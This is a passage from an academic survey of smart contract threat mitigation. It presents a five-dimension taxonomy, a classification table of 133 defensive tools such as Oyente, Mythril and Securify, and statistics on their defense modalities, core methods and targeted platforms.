scape of smart contracts: 1) comprehensive 5-dimensional classification taxonomy; 2) synthesis
of design workflows corresponding to the eight core methods; 3) vulnerability coverage map; and
4) evolutionary analysis with trends and perspectives. The combination of these four steps applied
to 133 solutions makes our work the most comprehensive systematization of smart contract threat
mitigation to date.
4.3: Methodology
In this section, we describe the details of the 4-step methodology that we use in this survey. Fig. 4.1
depicts these steps, which include: Step I: developing the classification taxonomy of smart con-
tract threat mitigation solutions; Step II: synthesizing the workflows of the core methods of threat
mitigation solutions; Step III: developing the vulnerability coverage map by threat mitigation so-
lutions; and Step IV: investigating the evolutionary trends and deficiencies of threat mitigation in
smart contracts. Next, we describe the approaches employed by these four steps in detail.
4.3.1: Classification Taxonomy
To classify the smart contract threat mitigation solutions, we build a comprehensive taxonomy of
threat mitigation, which includes the following five orthogonal dimensions (see Table 4.1): 1) de-
fense modality, 2) core method, 3) targeted contracts, 4) data mapping, and 5) threat model. We
                                                    76


                           Figure 4.1: Four-step methodology of this survey.
empirically verify that our taxonomy is not only concise but also allows to describe a threat mitiga-
tion solution with high accuracy. For example, using our taxonomy, the popular threat mitigation
tool Oyente [200] can be accurately described via the following single sentence:
       “Oyente is a security tool based on symbolic execution that detects and reports vulner-
       abilities in the bytecode of malicious or buggy Ethereum smart contracts.”
    Moreover, our taxonomy is cross-platform and general enough to be applied to the future de-
velopments of threat mitigation for smart contracts, even when new methods or platforms emerge.
Next, we describe all these five dimensions of the threat mitigation taxonomy in detail.
Defense Modality: The defense modality is the essential philosophy used by a threat mitigation
solution to achieve its goals, which is either prevention, detection, or exploration. The prevention
methods aim at verifying or enforcing certain security properties of a smart contract. For exam-
ple, the requirement that if a smart contract accepts cryptocurrency deposits, it must also provide
the functionality for cryptocurrency withdrawal, can be used by a solution with the prevention
modality as a property to enforce or verify security. The detection methods look for known vul-
nerabilities in smart contracts. For instance, defense tools that search for reentrancy vulnerabilities
in smart contracts pertain to the detection defense modality. The exploration approaches enhance
                                                  77


                       Table 4.1: Smart contract threat mitigation taxonomy
          Classification Dimension             Possible Values            Short Notation
                                                  prevention                      PR
              Defense Modality                     detection                     DET
                                                 exploration                     EXP
                                                static analysis                   SA
                                             symbolic execution                   SE
                                                    fuzzing                        F
                                               formal analysis                    FA
                 Core Method
                                              machine learning                    ML
                                              execution tracing                   ET
                                                code synthesis                    CS
                                           transaction interception               TI
                                                  Ethereum                       ETH
                                              EVM-compatible                    EVMc
             Targeted Contracts
                                                 any contract                     aC
                                                non-Ethereum                    nETH
                                             Input          Output         Input Output
                                          source code        report          S         R
                                            bytecode      source code        B         S
                Data Mapping                  ABI          bytecode          A         B
                                         specifications      action          Sp        Ac
                                           chain data       exploits         C         E
                                         assembly code metadata              As        M
                                           vulnerable contract only               VC
                Threat Model               malicious contract only                MC
                                      malicious or vulnerable contract           MVC
the transparency of a smart contract or associated transactions in order to facilitate security audits.
For example, an auditing tool that allows demystifying the call stack of a complicated smart con-
tract, thereby exposing the potential security problems, would belong to the exploration defense
modality.
Core Method: The core method is the technical approach describing the implementation princi-
ples of a given threat mitigation solution. Unlike defense modality, which describes the general
philosophy of a solution, the core method describes the implementation methodology utilized by
the solution; in other words, the same defense philosophy can be implemented in a number of dif-
ferent core methods. Threat mitigation solutions belonging to the same core method, despite the
                                                 78


       Figure 4.2: Venn diagram of relationships between different scopes of smart contracts.
diversity of implementations, share the same major workflow with possible minor additions. For
example, all symbolic execution methods take a smart contract and a set of specifications as an
input, utilize an SMT solver, and produce a human-readable report as an output; however, many
symbolic execution solutions, in addition to the standard workflow items, add some additional mod-
ules and data units. In this work, we build workflows that demonstrate which items are essential
and which of them provide an incremental augmentation.
Targeted Contracts: The dimension of targeted contracts describes the class of smart contracts
that a threat mitigation solution applies to. This dimension is largely shaped by the practical circum-
stance, in which the vast majority of smart contract threat mitigation solutions target the popular
Ethereum platform. Moreover, we notice that within the Ethereum platform, there is very little
variety in terms of what kind of Ethereum smart contracts the threat mitigation solutions target.
In other words, most solutions target Ethereum, and these Ethereum-based solutions are suitable
for any Ethereum contract. Thus, to accurately represent the practical reality of the distribution of
smart contract threat mitigation solutions in the dimension of targeted contract, we subdivide this
dimension into four classes: Ethereum smart contracts, EVM-compatible smart contracts, non-
Ethereum smart contracts, and any smart contract (i.e., platform-agnostic). Fig. 4.2 shows the
Venn diagram of the relationships between these classes. Specifically, all Ethereum contracts are
EVM-compatible, but there are non-Ethereum platforms that may or may not be EVM-compatible.
At the same time, the “any contract” scope would embrace all the types of smart contracts men-
tioned above, without prioritizing any of them.
                                                   79


Data Mapping: The data mapping dimension describes what the input and output of a given
threat mitigation solution are. As shown in Table 4.1, the input of a threat mitigation solution
may be a combination of 1) source code; 2) bytecode; 3) application binary interface (ABI); 4)
security specifications; 5) chain data; or 6) assembly code. The output can be represented by any
combination of the following six entities: 1) security report; 2) source code; 3) bytecode; 4) defense
action; 5) set of exploits; or 6) metadata. In this work, we use the symbol 7→ as a convention for
data mapping. For example, if the input of a threat mitigation solution is a set of specifications with
the source code of the smart contract, and the output is a human-readable report, then we denote
such a mapping as Sp,S7→R. As we can see, the data mapping dimension allows to concisely and
informatively describe the requirements for the input and expectations for the output for a smart
contract threat mitigation solution.
Threat Model: The dimension of threat model describes the vector(s) of potential attacks that the
threat mitigation solution aims to prevent, detect, or explore. We empirically observe that all the
smart contract threat mitigation solutions belong to either of the three general threat models: 1) the
one with the malicious smart contract; 2) the one in which the smart contract is the victim; and 3)
the agnostic model, in which the contract may be either malicious or a victim. For example, the
threat mitigation solutions capable of preventing exploitations of the reentrancy vulnerability, re-
sponsible for the infamous DAO hack [123], belong to the VC (victim contract) model. Conversely,
a tool defending against honeypot smart contracts, which set unexpected traps for hackers attempt-
ing to exploit known smart contract vulnerabilities, is a typical example of a threat mitigation tool
assuming the malicious contract (MC) threat model. However, some solutions defend against vul-
nerabilities that can be used both in a malicious or a victim smart contract; in this case, we assign
to this solution the malicious-or-vulnerable contract (MVC) model. For example, the SWC-123 vul-
nerability [40], called Requirement Violation, can be both a bug in a vulnerable smart contract or
an intentional malicious action of the smart contract developer.
                                                  80


4.3.2: Workflows of Core Methods
In this survey, not only do we explore what the smart contract threat mitigation solutions do, but we
also explore, for the first time, how these solutions accomplish their goals. In order to do that, we
adopt the following approach: for each of the eight core methods, we synthesize the workflows of
all the existing solutions implementing these methods to showcase the mandatory (common for all
solutions) and augmented (observed in some solutions) elements. Sections 4.5.1—4.5.8 describe
the synthesized workflows of all the eight core methods of smart contract threat mitigation. In order
to embrace the diverse variety of implementations, we use a uniform set of conventions in the eight
workflows. Specifically, we use three types of elements connected with flows (arrows): modules
(data processors), data entities, and environments (groups).
4.3.3: Vulnerability Coverage
The third step of our survey is scrutinizing the vulnerability coverage, i.e., to determine which
known vulnerabilities are detectable and/or preventable by the existing threat mitigation solutions.
To accomplish that, we create a uniform vulnerability coverage map using the popular SWC Reg-
istry. This task poses two major challenges: i) many threat mitigation solutions do not explicitly
or even implicitly declare the set of addressed vulnerabilities; ii) the majority of threat mitigation
solutions refer to the existing vulnerabilities using custom names and/or groupings, which often
do not correspond to the SWC taxonomy. Here, we select the 38 threat mitigation solutions that
explicitly specify the list of targeted vulnerabilities, and then we meticulously translate the declared
vulnerability coverage provided by the selected 38 solutions into the SWC conventions.
4.3.4: Threat Mitigation Evolution
Our final step explores the evolution of the smart contract threat mitigation solutions, as well as
the trends and obstacles observed in this area of computer security. Specifically, we explore the
adoption and augmentation of new core methods over time. For each threat mitigation solution,
we keep track of the publication date as well as the initial release or announcement date, whenever
                                                     81


available. Additionally, we analyze the “blind spots” of the existing body of smart contract mit-
igation solutions — the potentially feasible yet unexplored combinations of approaches that can
bring more benefits, especially if a similar combination of approaches has been successful in other
more mature areas of computer security. As a result, we make five observations supported by data
and evidence. First, we identify that dynamic transaction interception methods of smart contract
threat mitigation are gaining momentum in the research community. Second, we show that the
smart contract threat mitigation solutions utilizing AI and machine learning have started playing
an important role in smart contract defense. Third, we identified the emerging trend for studying
human-machine interaction in the domain of smart contracts. Fourth, we confirm that Ethereum
smart contracts are over-represented by the threat mitigation solutions, and we discuss likely rea-
sons explaining this phenomenon. Finally, we discuss the necessity for more exploration tools and
large-scale measurements for gathering important data about smart contract security, such as the
real market value of smart contracts and the traces of choices made by miners and crypto exchanges.
4.4: Threat Mitigation Classification
In this section, we apply the taxonomy developed earlier (Section 4.3.1) to describe each of the
threat mitigation solutions via the five orthogonal dimensions: threat mitigation modality (Section
4.4.1), core method (Section 4.4.2), the scope of targeted contracts (Section 4.4.3), the input-output
data mapping of the solution (Section 4.4.4), and the assumed threat model (Section 4.4.5). The
results of our classification are given in Table 4.2. Furthermore, we perform a frequency analysis
of the results along the five dimensions, and create a visual representation of the distributions of
defense modalities, core methods, targeted contracts, and threat models in Fig. 4.3. In the first
column of the table, we assign to each of the threat mitigation solutions a permanent Security
Threat Mitigation (STM) registry identifier in the STM-XXX format. The second column provides
the name of the tool implementing the solution along with its reference; if a solution does not have
a common name, we refer to the solution by its authors (e.g., Ivanov et al.). In columns 3–7, we
provide the values along the five classification dimensions for each of the 133 threat mitigation
                                                  82


Table 4.2: Classification of threat mitigation solutions based on the proposed taxonomy.
                                                               Classification Criteria (Dimensions)†
   STM                     Threat
 registry               mitigation                Defense           Core       Targeted              Data          Threat
   code                   solution                Modality       Method        Contracts         Mapping           Model
STM-001                Oyente [200]                  DET             SE            ETH              B 7→ R           MVC
STM-002                Mythril [215]                 DET             SE            ETH              B 7→ R           MVC
STM-003               Securify [271]              DET+PR             SA            ETH          B,S 7→ R,M           MVC
STM-004                 Maian [223]                  DET             SE            ETH              B 7→ R           MVC
STM-005              Manticore [214]                 DET             SE            ETH              B 7→ R           MVC
STM-006                KEVM [148]                    EXP             FA            ETH              B 7→ R           MVC
STM-007                 ZEUS [168]                   PR              SE            ETH              B 7→ R           MVC
STM-008                Sereum [240]                  DET          ET,TI            ETH              C 7→ R            VC
STM-009           ECFChecker [137]                   PR           ET,TI            ETH              C 7→ R            VC
STM-010                teEther [178]                 DET             SE            ETH              B 7→ E            VC
STM-011                 Hydra [74]                   PR              CS            ETH              S 7→ B            VC
STM-012                 Erays [310]                  EXP             SA            ETH              B 7→ M           MVC
STM-013             TokenScope [96]                  DET             ET            ETH              C 7→ R           MVC
STM-014                 Osiris [269]                 DET             SE            ETH              B 7→ R            VC
STM-015                 Vandal [76]                  DET             SA            ETH              B 7→ R           MVC
STM-016               FSolidM [205]                  PR              CS            ETH           S,Sp 7→ S            VC
STM-017 ContractFuzzer [163]                         DET              F            ETH           A,B 7→ R             VC
STM-018 S-GRAM/Ether* [194]                          DET             SA            ETH              S 7→ R           MVC
STM-019              MadMax [133]                    DET             SA            ETH              B 7→ R           MVC
STM-020            SmartCheck [267]                  DET             SA            ETH              S 7→ R           MVC
STM-021               ReGuard [193]                  DET              F            ETH           S 7→ R,E             VC
STM-022               GASPER [95]                    DET             SA            ETH              B 7→ R            MC
STM-023 Grishchenko et al. [136]                     EXP             FA            ETH              B 7→ M           MVC
STM-024                 Lolisa [294]                 PR              FA            ETH              S 7→ R           MVC
STM-025                 SASC [307]                   EXP             SA            ETH              S 7→ R           MVC
STM-026              Chen et al. [97]                DET          ET,SA            ETH            C,S 7→ R            MC
STM-027 Solidity*/EVM* [64]                          PR           SA,FA            ETH              S 7→ R           MVC
STM-028             Amani et al. [52]                PR           SA,FA            ETH           B,Sp 7→ R           MVC
STM-029 Model-Checking [217]                         PR              FA            ETH           Sp,S 7→ R           MVC
STM-030             EtherTrust [135]                 DET             SA            ETH              B 7→ R           MVC
STM-031                  Flint [249]                 PR              CS            ETH             Sp 7→ S            VC
STM-032           HoneyBadger [270]                  DET          SA,SE            ETH              B 7→ R            MC
STM-033                  ILF [146]                   DET            F,ML           ETH            B,S 7→ R           MVC
STM-034              VeriSolid [206]                 PR           FA,CS            ETH           S,Sp 7→ S            VC
STM-035             solc-verify [141]                PR              SA            ETH           S,Sp 7→ R           MVC
STM-036                Slither [114]                 DET             SA            ETH              S 7→ R           MVC
STM-037               sCompile [89]                  DET             SE            ETH              B 7→ R           MVC
STM-038            NPChecker [280]                   DET             SA            ETH              B 7→ R           MVC
STM-039                 BitML [58]                   PR              SA           nETH         C,Sp 7→ R,E            VC
STM-040                 CESC [187]                   DET             SA            ETH              B 7→ R            VC
† DET— detect; PR — prevent; EXP — exploration; SA — static analysis; SE — symb. execution; F — fuzzing; FA — form. analysis;
A — ABI; ML — mach. learning; ET — ex. tracing; CS — code synthesis; TI — transaction interc.; S — source code; B — bytecode;
Sp — specifications; C — chain data; As — assemb. code; R — report; Ac — action; E — exploits; M — metadata; ETH — Ethereum;
  nETH — non-Ethereum; EVMc — EVM-comp.; aC — any contr.; VC — vuln. contr.; MC — mal. contr.; MVC — mal. or vuln. contr.
                                                             83


                                Table 4.2 (cont’d)
                                                 Classification criteria
  STM            Threat
 registry      mitigation       Defense      Core    Targeted          Data   Threat
   code         solution        Modality    Method   Contracts      Mapping   Model
STM-041     EasyFlow [127]        DET         SA        ETH           C 7→ R    VC
STM-042      Vultron [278]        DET         CS        ETH           S 7→ R    VC
STM-043      SAFEVM [48]          PR          SA        ETH         S,B 7→ R   MVC
STM-044     EthRacer [176]        DET         F         ETH         B,C 7→ R   MVC
STM-045 SolidityCheck [301]       DET         SA        ETH           S 7→ R   MVC
STM-046     EVMFuzz [125]         DET         F         ETH           S 7→ R   MVC
STM-047   EVulHunter [236]        DET         SA        ETH          As 7→ R    VC
STM-048      GasFuzz [202]        DET         F         ETH           B 7→ R   MVC
STM-049    NeuCheck [198]         DET         SA        ETH           S 7→ R   MVC
STM-050    SolAnalyser [47]       DET         SA        ETH           S 7→ R   MVC
STM-051     SoliAudit [189]       DET         F         ETH           S 7→ R   MVC
STM-052       MPro [304]          DET       SA,SE       ETH           S 7→ R   MVC
STM-053      Li et al. [186]      PR          FA        ETH           S 7→ R    VC
STM-054       Gastap [49]         PR          SA        ETH       S,B,As 7→ R  MVC
STM-055 Momeni et al. [212]       DET         ML        ETH           S 7→ M   MVC
STM-056     KSolidity [165]       EXP         FA        ETH           S 7→ M   MVC
STM-057        VerX [230]         PR        SE,CS       ETH           S 7→ R   MVC
STM-058     VeriSmart [261]       DET         SA        ETH           S 7→ R   MVC
STM-059     TxSpector [299]       EXP       SA,ET       ETH           C 7→ R   MVC
STM-060    Zhou et al. [309]      EXP         SA        ETH           C 7→ R   MVC
STM-061    ETHBMC [122]           DET         SE        ETH           B 7→ R   MVC
STM-062        SODA [94]          DET         TI       EVMc        C 7→ R,Ac    VC
STM-063        Ethor [248]        PR        SA,FA       ETH           B 7→ R   MVC
STM-064       ÆGIS [117]          DET         TI        ETH        C 7→ R,Ac    VC
STM-065      SafePay [188]        DET         SE        ETH         S,B 7→ R    VC
STM-066        Solar [116]        DET       CS,SE       ETH          Sp 7→ R    VC
STM-067   EVMFuzzer [126]         DET         F        EVMc          Sp 7→ R   MVC
STM-068      ModCon [196]       DET+PR        F          aC           S 7→ R   MVC
STM-069       Harvey [291]        DET         F         ETH           S 7→ R   MVC
STM-070     Solythesis [183]      PR          CS        ETH           S 7→ S    VC
STM-071      Ethainter [75]       DET         SA        ETH           S 7→ R   MVC
STM-072       sFuzz [221]         DET         F         ETH         B,A 7→ R   MVC
STM-073       Seraph [295]        DET         SE         aC           S 7→ R   MVC
STM-074   Clairvoyance [296]      DET         SA        ETH           S 7→ R    VC
STM-075      Artemis [274]        DET         SE        ETH           B 7→ R   MVC
STM-076      Echidna [134]        DET         F         ETH       B,Sc 7→ R,M  MVC
STM-077      EShield [293]        PR          CS        ETH           B 7→ B    VC
STM-078 SMARTSHIELD [305]         DET         CS        ETH         B 7→ B,R    VC
STM-079    ETHPLOIT [303]         DET         F         ETH           S 7→ E   MVC
STM-080   Cecchetti et al. [84]   PR          CS         aC           S 7→ R    VC
STM-081     EthScope [289]        DET         ET        ETH           C 7→ R    MC
STM-082 ContractWard [281]        DET         ML        ETH         S 7→ R,M   MVC
STM-083         RA [100]          DET       SA,SE       ETH           B 7→ R    VC
STM-084   Camino et al. [80]      DET         SA        ETH           B 7→ R    MC
STM-085 OpenBalthazar [56]        DET         SA        ETH           S 7→ R   MVC
STM-086     sGUARD [220]          PR        SA,FA       ETH           B 7→ R    VC
STM-087    SmartPulse [263]       PR          SA        ETH        S,Sp 7→ R   MVC
                                         84


                                    Table 4.2 (cont’d)
                                                       Classification criteria
  STM              Threat
 registry        mitigation           Defense      Core    Targeted          Data   Threat
   code           solution            Modality   Method    Contracts      Mapping   Model
STM-088          SeRIF [83]             DET         FA         aC          S 7→ R     VC
STM-089      EVMPatch [241]             DET         CS        ETH         B,C 7→ B    VC
STM-090      Perez et al. [228]         EXP         ET        ETH          C 7→ R     VC
STM-091       DEFIER [264]              DET         ET        ETH           C 7→ R   MVC
STM-092       SmarTest [260]            DET       SE,SA       ETH         B 7→ R,E   MVC
STM-093       EOSAFE [147]              DET         SA       nETH          B 7→ R    MVC
STM-094     Ivanov et al. [158]       PR+DET        SA        ETH          S 7→ R     MC
STM-095      ConFuzzius [119]           DET          F        ETH         B,A 7→ R   MVC
STM-096     Huang et al. [154]          DET         SA        ETH          B 7→ R     VC
STM-097       STC/STV [153]              PR         SA        ETH          S 7→ R     VC
STM-098         Horus [120]             DET         ET        ETH          C 7→ R    MVC
STM-099       BlockEye [276]            DET       ET,TI       ETH           C 7→ R   MVC
STM-100         Sailfish [70]           DET       SE,SA       ETH          B 7→ R    MVC
STM-101     DeFiRanger [290]            DET         SA        ETH          C 7→ R     VC
STM-102       ESCORT [199]              DET         ML        ETH        B,Sp 7→ R   MVC
STM-103     DefectChecker [93]          DET         SE        ETH          B 7→ R    MVC
STM-104        Hu et al. [152]          DET       SA,ML       ETH          B 7→ R    MVC
STM-105   HFContractFuzzer [108]        DET          F       nETH          S 7→ R     VC
STM-106        Solidifier [54]           PR         FA        ETH           S 7→ R    VC
STM-107 SafelyAdministrated [156]        PR       CS,ML       ETH          S 7→ S     MC
STM-108        EXGEN [166]              DET         SE         aC          S 7→ R     VC
STM-109       EtherProv [191]           DET         SA        ETH         S 7→ B,M   MVC
STM-110    Abdellatif et al. [44]        PR         FA         aC          C 7→ R    MVC
STM-111        Bai et al. [59]           PR         FA         aC          Sp 7→ R   MVC
STM-112        Bigi et al. [65]          PR         FA         aC          Sp 7→ R   MVC
STM-113          Findel [66]             PR         CS         aC          Sp 7→ S    VC
STM-114    ContractLarva [112]           PR         CS        ETH        S,Sp 7→ S   MVC
STM-115        Le et al. [182]           PR         FA         aC          S 7→ R    MVC
STM-116       Solicitous [204]           PR         SA        ETH           S 7→ B   MVC
STM-117        VeriSol [283]             PR         FA       EVMc           S 7→ R    VC
STM-118      SmartCopy [115]            DET          F        ETH         B,A 7→ R    VC
STM-119        WANA [277]               DET         SE         aC          B 7→ R    MVC
STM-120        E-EVM [224]              EXP         ET        ETH          C 7→ R    MVC
STM-121   AMEVulDetector [197]          DET         ML         aC           S 7→ R   MVC
STM-122        Javadity [46]             PR         CS       EVMc          S 7→ S    MVC
STM-123    Alqahtani et al. [51]         PR         SA         aC          S 7→ B    MVC
STM-124     Bartoletti et al. [60]       PR         FA       nETH          S 7→ R    MVC
STM-125      Beckert et al. [61]         PR         FA       nETH           S 7→ R    VC
STM-126      SmartInspect [72]          EXP         SA        ETH         S,C 7→ R   MVC
STM-127          CPN [109]              EXP         SA        ETH         S,B 7→ R   MVC
STM-128      Hajdu et al. [142]          PR       FA,SA       ETH           S 7→ R   MVC
STM-129   Kongmanee et al. [177]         PR         FA        ETH          Sp 7→ M   MVC
STM-130         EVM* [203]               PR         TI        ETH       B,C 7→ R,Ac  MVC
STM-131 OpenZeppelin Contracts [33]      PR         CS        ETH           S 7→ S    VC
STM-132         MythX [31]              DET       many        ETH           B 7→ R   MVC
STM-133    Contract Library [26]      DET+PR        CS        ETH          B 7→ R    MVC
                                            85


solutions. Furthermore, to keep the data in this table up to date and handy, we deploy the Smart
Contract Threat Mitigation Registry (STM Registry).
Selection Method of the Threat Mitigation Solutions: For this survey, we select 133 threat miti-
gation solutions, encompassing both academic research projects (e.g., Securify [271], Oyente [200]
and commercial non-academic efforts (e.g., OpenZeppelin Contracts [33], MythX [31]). To assure
the quality of our study, we use the following four criteria for selecting threat mitigation solutions:
   1. Implementation. We select only solutions that are implemented and evaluated, either as a
       proof-of-concept (PoC) prototype or in the form of a final product.
   2. Publication. For academic research projects, we search for the papers published or accepted
       at a reputable peer-reviewed venue.
   3. Impact. We select solutions that deliver specific improvements or other unique qualities
       compared to the state-of-the-art solutions.
   4. Novelty. Not only do we consider the fact of improvement or impact, but we also consider
       the presence of technical novelty, i.e., a specific innovation that leads to the improvement.
    In some cases, we include threat mitigation solutions that do not meet all the four above criteria,
such as the academic project Vandal [76], which has never been published at a peer-reviewed venue.
However, we include this work in our survey because it is widely adopted and cited.
Lessons Learned: There are more than 200 claims of smart contract threat mitigation solutions.
Yet, our thorough manual examination reveals various problems associated with some of them. For
example, we observed that sometimes two research papers refer to the same implementation (e.g.,
poster or journal extension articles). In the end, 133 instances have been selected to represent the
body of smart contract threat mitigation solutions. Therefore, manual scrutiny of each work is
required.
                                                   86


            (a) Defense modality                             (b) Core method
             (c) Targeted contracts                          (d) Threat model
Figure 4.3: Distribution of threat mitigation methods by four criteria: defense modality, core
method, targeted contracts, and threat model.
4.4.1: Threat Mitigation Modalities
A threat mitigation modality is a philosophy that a smart contract threat mitigation method employs
to address security issues of a smart contract. The threat mitigation solutions that employ the de-
tection modality are designed to identify vulnerabilities in smart contracts. Some of them (e.g.,
Oyente [200], Securify [271], Vandal [76], and Mythril [215]) target several groups of vulnerabil-
ities. Other detection-based threat mitigation solutions focus on specific classes of vulnerabilities,
such as Sereum [240], which detects only reentrancy vulnerabilities (SWC-107 [37]). Another
narrow-focused detection tool is VeriSmart [261], which detects arithmetic bugs only. Overall,
we note that the detection solutions that focus on specific vulnerabilities tend to deliver improved
detection rates compared to the solutions targeting multiple vulnerabilities.
     The solutions belonging to the prevention modality validate some safety properties or rules.
ZEUS [168] provides eight semantic rules that are used as part of an abstract assertion language
                                                 87


for specifying safety properties for ensuring that a smart contract is free of certain vulnerabilities
(e.g., reentrancy, unchecked send, integer overflow, etc.). Another salient representation of a pre-
vention solution is SmartPulse [263], which creates a linear temporal logic (LTL) language, called
SmartLTL, for expressing temporal safety properties in smart contracts and enforcing them with
the SmartPulse verifier.
    The exploration modality solutions do not detect vulnerabilities or enforce safety properties;
instead, they reveal previously concealed data that facilitates human-based or automated auditing
of a smart contract. Erays [310] is a tool for reverse-engineering of smart contracts that converts a
bytecode of a smart contract into pseudocode-like metadata. TxSpector [299] is another exploration
solution, which is a transaction processing framework that identifies the executed attacks in smart
contract execution traces.
    Some threat mitigation solutions adhere to a hybrid detection+prevention modality, which means
that they can detect existing vulnerabilities, as well as enforce security properties. Securify [271]
not only checks the compliance with security patterns but also detects violations of patterns asso-
ciated with specific vulnerabilities, such as reentrancy and restricted transfer. Another threat mit-
igation solution with a hybrid detection+prevention modality is ModCon [196], which is a smart
contract testing tool that generates a list of states and transitions between these states, thereby en-
abling further identification of vulnerabilities and confirmation of security properties.
    Fig. 4.3a shows the breakdown of the three defense modalities among the 133 threat mitigation
solutions. As we can see, 81 (59.6%) of all the threat mitigation solutions employ the detection
modality, 44 (32.4%) use the verification modality, and the remaining 11 (8.1%) belong to the
exploration modality. Some threat mitigation solutions exhibit a hybrid modality (e.g., DET+PR
— detection combined with prevention), in which case we identify and assume the predominant
modality for the statistical analysis, or we count both modalities in cases when it is impossible to
detect the predominant one — which explains the 136 total modalities considered, despite the fact
that they correspond to 133 threat mitigation solutions.
                                                    88


4.4.2: Core Methods
The core method describes how a threat mitigation solution addresses the security issues of a smart
contract. In other words, the core method defines the implementation approach, choice of algo-
rithms, and internal data processing model of a threat mitigation solution. By scrutinizing all the
133 smart contract threat mitigation solutions, we identify eight distinct core methods: 1) static
analysis; 2) symbolic execution; 3) fuzzing; 4) formal analysis; 5) machine learning; 6) execution
tracing; 7) code synthesis; and 8) transaction interception.
    Static analysis solutions extract data from smart contracts in order to detect vulnerabilities or
confirm safety properties. Most static analysis solutions adhere to the detection modality (e.g., Se-
curity [271], S-GRAM [194], MadMax [133], SmartCheck [267]). However, some static analysis
solutions enforce policies instead of detecting vulnerabilities (e.g., solc-verify [141], BitML [58],
GasTap [49], Solicitious [204]). Moreover, we notice that the static analysis core method is often
coupled with some other methods. Solidity* [64], Amani et al. [52], Ethor [248], and sGUARD [220]
use static analysis together with formal analysis. Also, static analysis is often used together with the
symbolic execution core method, as we can see in HoneyBadger [270], MPro [304], SmarTest [260],
and Sailfish [70].
    Symbolic execution methods execute a smart contract with symbolic parameters instead of real
ones — in order to make conclusions regarding some security properties of smart contracts (e.g.,
the range of values that make a certain condition true). Oyente [200], Mythril [215], Maian [223],
Manticore [214], ZEUS [168], Osiris [269], teEther [178] are popular solutions employing the sym-
bolic execution core method. Similar to static analysis, symbolic execution is also often coupled
with other core methods. VerX [230] and Solar [116] use symbolic execution to guide code syn-
thesis. The solution by Hu et al. [152] takes advantage of both symbolic execution and machine
learning for detecting smart contract vulnerabilities.
    Fuzzing methods perform smart contract testing by iteratively generating test cases that are
likely to reveal vulnerabilities. ContractFuzzer [163] uses the abstract binary interface (ABI) of the
smart contract to facilitate the generation of fuzzing inputs. Harvey [291] is a smart contract tester
                                                  89


based on greybox fuzzing, which is a middle-ground solution between the absence of code analy-
sis (blackbox fuzzing) and full code execution (whitebox fuzzing); specifically, greybox fuzzing
assumes a lightweight (compared to symbolic execution) analysis of the code execution paths. Con-
fuzzius [119] is a smart contract fuzzer that uses a combination of genetic algorithms and constraint
solving. Overall, fuzzing threat mitigation solutions utilize a diverse variety of predictive methods
for balancing accuracy and performance.
    Formal analysis methods convert a smart contract into a formal representation and run a solver
over this representation to prove or disprove some security properties. Most solutions employing
the formal analysis core method belong to either the prevention defense modality (e.g., Lolisa [294],
Model-Checking [217], Li et al. [186], Solidifier [54], VeriSol [283]) or the exploration modality
(e.g., KEVM [148], Grishchenko et al. [136]). However, SeRIF [83], which primary purpose is
defense against reentrancy, demonstrates that the formal analysis can also be used for targeting
vulnerabilities.
    Machine learning methods extract features from smart contracts and train models for detect-
ing vulnerabilities. The smart contract threat mitigation solutions utilizing the machine learning
core method are ContractWard [281], ESCORT [199], AMEVulDetector [197], and the solution by
Momeni et al. [212]. In Section 4.7.2, we conduct an in-depth discussion about the evolutionary
perspective of machine learning in smart contract security.
    Execution tracing and transaction interception core methods constitute the transaction-based
methods of smart contract threat mitigation. The execution tracing methods examine the runtime
traces of the actual transactions submitted to a smart contract in order to detect vulnerabilities, verify
safety properties, or facilitate manual auditing. TokenScope [96], EthScope [289], DEFIER [264],
Horus [120], BlockEye [276], E-EVM [224] are instances of “pure” execution tracing methods (i.e.,
not combined with other methods).
    Code synthesis threat mitigation solutions aim at generating vulnerability-free smart contract
code resistant to attacks. Hydra [74] is a framework that generates bug bounties for smart contracts
using the N-of-N version programming (NNVP) principle. FSolidM [205] is a framework for de-
                                                   90


signing secure smart contracts as finite state machines (FSMs) and converting them into Solidity
code. Solythesis [183] is a source-to-source Solidity compiler that instruments the input source
code with additional instructions for validation of security-sensitive invariants.
    Transaction interception solutions dynamically observe the transaction pool of a blockchain
node in order to prevent the execution of malicious or unsafe transactions. These solutions are
represented by SODA [94], and EVM* [203]. However, we observe that execution tracing is often
combined with other core methods. Sereum [240] and ECFChecker [137] combine execution trac-
ing with transaction interception, while TxSpector [299] and the Ponzi scheme detection solution
by Chen et al. [97] utilize trace execution combined with static analysis.
    Fig. 4.3b shows the distribution of the eight core methods among the 133 threat mitigation so-
lutions. Specifically we found 49 (35.3%) static analysis tools, 21 (15.1%) symbolic execution
methods, 15 (10.8%) fuzzing tools, 22 (15.8%) formal analysis tools, 5 (3.6%) machine learning
solutions, 11 (7.9%) execution tracing tools, 13 (9.4%) code synthesis tools, and 3 (2.2%) trans-
action interceptors. Notably, some threat mitigation solutions employ a combination of the afore-
mentioned core methods; in this case, we recognize all the methods evolved in Table 4.2, yet for
the purpose of counting and frequency analysis, we reduce the combination of core methods to
the predominant core method, if there is one. If it is impossible to identify the predominant core
method, we count all of them, which explains that the total count of instances of core methods
slightly exceeds the number of the threat mitigation solutions surveyed in this work.
4.4.3: Targeted Contracts
Each of the threat mitigation solutions assumes a type of targeted smart contract. Some solutions
target general groups of smart contracts, such as Ethereum or even all possible contracts, while some
other solutions may target a single specific smart contract instance. Oyente [200], Mythril [215],
Securify [271], Sereum [240], Vandal [76], OpenZeppelin Contracts [33], MythX [31], Contract
Library [26], and many other popular threat mitigation solutions are strictly Ethereum-based. Some
solutions are EVM-compatible, which means that they are compatible with but not limited by the
                                                  91


Ethereum smart contracts. SODA [94], VeriSol [283], and Javadity [46] are EVM-compatible
solutions. Some solutions are universal in terms of the scope of targeted contracts; although they
might not support any type of smart contracts (e.g., the ones that are not Turing-complete), they
do not limit their scope to a specific group either. Such solutions are ModCon [196], Seraph [295],
SeRIF [83], EXGEN [166], and the information flow control solution by Cecchetti et al. [84]. Some
threat mitigation solutions target a specific non-Ethereum platform. BitML [58] targets Bitcoin
smart contract overlays, EOSAFE [147] targets the smart contracts on the EOS blockchain [27],
and HFContractFuzzer [108] targets the Hyperledger Fabric platform [53].
      To make sense of this diverse spectrum, we group the targeted smart contracts into four types.
Fig. 4.3c shows the distribution of different groups of targeted contracts among the threat mitigation
methods. Specifically, we discover that as many as 111 (83.5%) solutions target Ethereum contracts,
13 (9.8%) are suitable for any contract (including Ethereum, but not specifying it), 5 (3.8%) aim
for some non-Ethereum contracts (e.g., Hyperledger Fabric), and 4 (3.0%) target EVM-compatible
